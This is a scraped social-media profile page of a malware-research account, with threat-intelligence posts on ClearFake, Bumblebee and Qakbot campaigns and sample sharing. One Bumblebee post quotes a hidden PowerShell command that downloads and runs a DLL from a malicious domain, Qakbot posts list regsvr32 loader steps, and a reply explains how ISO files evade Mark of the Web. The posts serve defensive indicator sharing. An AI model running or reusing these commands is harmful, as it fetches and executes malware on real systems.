malwarelabnet

54 posts

malwarelabnet

malwarelabnet

@malwarelabnet

https://t.co/NZBDZQq7TD - A simple project to submit malware to MalwareBazaar https://t.co/eO9IA7x3Y1

انضم Ağustos 2020
90 يتبع288 المتابعون
Gen Threat Labs
Gen Threat Labs@GenThreatLabs·
Ongoing #FakeUpdates #ClearFake campaign targetting Argentina 🇦🇷, Mexico 🇲🇽 and France 🇫🇷 pushing #zgRAT via multiple compromised domains.
Gen Threat Labs tweet media
English
4
10
16
5.6K
JP
JP@jpvigneault·
@executemalware Can you share the maldoc on Bazaar or VT? Cheers
English
2
0
2
0
proxylife
proxylife@pr0xylife·
#Bumblebee - .zip > .iso > .lnk > .bat > ps > .dll powershell -w hidden -nop -ep bypass -enc iex (new-object net.webclient).downloadstring("http://meeronixt.]com/gate/dll/12.dll") rundll32.exe C:\Users\**\AppData\Local\mIOPiX.bin,CreateTask IOC's github.com/pr0xylife/Bumb…
proxylife tweet media
English
5
50
148
0
malwarelabnet
malwarelabnet@malwarelabnet·
Reached the milestone of 2500 samples submitted to @abuse_ch :)
malwarelabnet tweet media
English
0
1
13
0
malwarelabnet أُعيد تغريده
Cryptolaemus
Cryptolaemus@Cryptolaemus1·
@log4jay @pr0xylife @1ZRR4H @executemalware @ffforward @ankit_anubhav @Max_Mal_ @malwarelabnet @malware_traffic @JAMESWT_MHT @fr0s7_ Using an ISO is for bypassing defenses. It will in some cases not even be scanned by AV. In other cases this vector usage will prevent metadata being applied to the file called the Mark of the Web or MOTW. This prevents Windows from tagging it as from the web and not safe.
English
0
9
27
0
Kirk Sayre
Kirk Sayre@bigmacjpg·
@GootLoaderSites Do you upload the zip/js payloads to VT or MalwareBazaar? If so, could you post the payload hashes along with the URLs?
English
1
0
0
0
proxylife
proxylife@pr0xylife·
#Qakbot - obama182 - url > .zip > .xlsb > .dll CreateDirectory C:\Merto CreateDirectory C:\Merto\Byrost regsvr32 /s calc regsvr32 C:\Merto\Byrost\Veonse.OOOCCCXXX IOC's github.com/pr0xylife/Qakb…
proxylife tweet media
Română
1
17
46
0
proxylife
proxylife@pr0xylife·
#Qakbot - AA - url > .zip > .xlsb > .dll "Marked as Final". CreateDirectory C:\Yerto CreateDirectory C:\Yerto\Narost regsvr32 /s calc regsvr32 C:\Yerto\Narost\Beunse.oooooooccccccccxxxxxxxx IOC's github.com/pr0xylife/Qakb…
proxylife tweet media
English
3
19
64
0